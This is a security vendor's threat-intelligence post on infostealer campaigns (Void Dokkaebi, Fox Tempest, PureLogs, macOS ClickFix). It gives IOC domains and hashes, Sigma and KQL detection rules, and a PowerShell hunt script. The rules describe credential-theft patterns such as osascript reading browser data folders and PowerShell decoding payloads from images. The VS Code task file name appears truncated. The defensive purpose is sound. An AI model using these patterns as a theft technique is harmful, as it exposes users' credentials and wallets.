Back to Intelligence

Infostealer Surge: Void Dokkaebi, Fox Tempest & PureLogs — OTX Pulse Analysis

SA
Security Arsenal Team
May 21, 2026
6 min read

Live OTX pulse data from 2026-05-21 indicates a coordinated surge in credential theft and malware distribution campaigns. The intelligence highlights the evolution of the North Korean-aligned Void Dokkaebi (WageMole) group, which has shifted to a self-propagating supply chain attack targeting software developers via malicious git repositories and fake job interviews. Simultaneously, the Fox Tempest actor is operationalizing a Malware-Signing-as-a-Service (MSaaS) ecosystem, facilitating the distribution of families like Lumma Stealer, Vidar, and Rhysida by abusing Microsoft Artifact Signing.

Parallel campaigns involve the PureLogs infostealer using PawsRunner to deliver payloads via steganography hidden in PNG images, and a macOS ClickFix campaign utilizing fake CAPTCHAs to deploy AppleScript stealers targeting browser data and crypto wallets. The collective objective across these pulses is the exfiltration of sensitive credentials, session cookies, and cryptocurrency wallet keys to facilitate financial theft and initial access for ransomware operations.

Threat Actor / Malware Profile

Void Dokkaebi (WageMole)

  • Malware: DEV#POPPER RAT, InvisibleFerret, OmniStealer, BeaverTail.
  • Distribution: Supply chain attack via poisoned code repositories. Uses "fake job interview" social engineering to lure developers into cloning malicious repos.
  • Persistence: Modifies VS Code task configurations (.vscode/tasks.) to execute malicious payloads upon opening the project.
  • Behavior: Worm propagation to infect other repositories; credential theft from development environments.

Fox Tempest

  • Role: Initial Access Broker / Enabler (MSaaS).
  • Malware Signed: Rhysida, Oyster, Lumma Stealer, Vidar, Qilin, Akira, BlackByte.
  • Technique: Abuses Microsoft Artifact Signing to generate fraudulent code-signing certificates, allowing malware to bypass security controls and appear trusted.
  • Targeting: Healthcare, Education, Government, and Finance sectors.

PureLogs / PawsRunner

  • Malware: PureLogs (.NET Infostealer).
  • Distribution: Phishing emails with TXZ archive attachments (invoice-themed).
  • Technique: Steganography. PawsRunner loader extracts encrypted payloads from benign-looking PNG images.
  • Execution: Uses JavaScript with environment variable obfuscation to launch PowerShell decoders.

macOS ClickFix

  • Malware: AppleScript-based Infostealer.
  • Distribution: Fake CAPTCHA pages (ClickFix) targeting both Windows and macOS.
  • Target: Keychain databases, 12+ browsers, 200+ extensions, 16 crypto wallets.

IOC Analysis

The provided pulses contain a mix of File Hashes (MD5, SHA1, SHA256), Domains, URLs, IPv4 addresses, and Hostnames.

  • File Hashes: A high volume of SHA256 hashes are present for payloads like DEV#POPPER, PureLogs, and signed binaries. SOC teams should ingest these into EDR solutions for immediate quarantining and historical scanning.
  • Network IOCs: Domains such as bull-run.fun, spot-wave.fun, signspace.cloud, and everycarebd.com serve as C2 or payload distribution infrastructure. FrostyNeighbor activity includes suspicious hostnames like mickeymousegamesdealer.alexavegas.icu.
  • Operationalization: IOCs should be blocked at the firewall/proxy level. SIEM correlations should trigger alerts for any process attempting to connect to these domains. The file hashes should be used in YARA rules to scan for steganographic images or malicious VS Code tasks.

Detection Engineering

YAML
---
title: Potential VS Code Task Persistence - Void Dokkaebi
id: 8a4b2c1d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
description: Detects modifications to .vscode/tasks. which may indicate a supply chain attack using malicious VS Code tasks.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/void-dokkaebi
tags:
    - attack.persistence
    - attack.t1547.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '.vscode/tasks.'
    condition: selection
falsepositives:
    - Legitimate developer activity modifying build tasks
level: high
---
title: PowerShell Steganography Decoder - PureLogs/PawsRunner
id: 9b5c3d2e-6f7a-5b8c-9d0e-1f2a3b4c5d6e
description: Detects PowerShell processes attempting to access image files combined with base64 decoding or stream operations, indicative of steganography loaders.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/purelogs
tags:
    - attack.defense_evasion
    - attack.t1027
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        CommandLine|contains:
            - '.png'
            - '.jpg'
            - '.bmp'
    selection_ps:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_decode:
        CommandLine|contains:
            - 'FromBase64String'
            - 'System.Drawing.Bitmap'
            - 'System.IO.Stream'
    condition: all of selection_*
falsepositives:
    - Legitimate image processing scripts
level: high
---
title: Suspicious AppleScript Browser Access - macOS ClickFix
id: 0c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f
description: Detects AppleScript (osascript) accessing browser cookie or history directories, typical of ClickFix infostealers on macOS.
status: experimental
date: 2026/05/21
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/clickfix-macos
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    product: macos
    category: process_creation
detection:
    selection_osascript:
        Image|endswith: '/osascript'
    selection_browser_path:
        CommandLine|contains:
            - '/Library/Application Support/Google/Chrome'
            - '/Library/Application Support/Firefox'
            - '/Library/Safari'
    condition: all of selection_*
falsepositives:
    - User automation scripts managing browser data
level: high


**KQL (Microsoft Sentinel)**

kql
// Hunt for network connections to known malicious domains from pulses
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl in ("bull-run.fun", "spot-wave.fun", "signspace.cloud", "everycarebd.com") 
    or RemoteHostname has "alexavegas.icu" or RemoteHostname has "needbinding.icu"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend TailoredIntel = "OTX Pulse Domain Hunt"


**PowerShell Hunt Script**

powershell
# IOC Hunter for Void Dokkaebi and PureLogs Pulse Hashes
$TargetHashes = @(
    "a12957e7627cb19fba2a4b155f7258b7", "e12285f507c847b986233991b86b22e3",
    "77b1beb083e4e2074402742ef2d677835072acf0e7ddd9ee8206e5a2c76b1ca5",
    "0fcb86ae384e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"
)

Write-Host "Scanning for malicious file hashes..." -ForegroundColor Cyan

Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($TargetHashes -contains $hash) {
            Write-Host "[!] MATCH FOUND: $($_.FullName)" -ForegroundColor Red
        }
        $sha256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($TargetHashes -contains $sha256) {
            Write-Host "[!] MATCH FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

# Check for suspicious VS Code tasks
$VSCodePath = "$env:APPDATA\Code\User"
if (Test-Path $VSCodePath) {
    Write-Host "Checking VS Code User Settings..." -ForegroundColor Cyan
    Get-ChildItem -Path $VSCodePath -Recurse -Filter "tasks." | ForEach-Object {
        Write-Host "[+] VS Code Tasks found: $($_.FullName)" -ForegroundColor Yellow
        # Manual review recommended for content
    }
}

Response Priorities

  • Immediate:

    • Block all listed domains and IPs at the network perimeter.
    • Run the PowerShell hunt script across endpoints to identify dropped payloads.
    • Quarantine any systems matching the Sigma rule alerts for VS Code task modification or PowerShell steganography.

  • 24 Hours:

    • If infection is confirmed (especially with OmniStealer, PureLogs, or ClickFix), assume credential compromise. Force password resets for impacted accounts and revoke session tokens.
    • Investigate developer workstations for signs of repository cloning (Void Dokkaebi) and check git history for tampering.

  • 1 Week:

    • Review and harden software supply chain policies. Mandate code review for all CI/CD tasks.
    • Implement application control to block unsigned PowerShell scripts and unauthorized AppleScript execution on macOS endpoints.
    • Audit code-signing certificate issuance logs to detect potential abuse by Fox Tempest.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealersupply-chain-attacksteganographycode-signing-abusenorth-korea-apt

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action
Infostealer Surge: Void Dokkaebi, Fox Tempest & PureLogs — OTX Pulse Analysis | Security Arsenal | Security Arsenal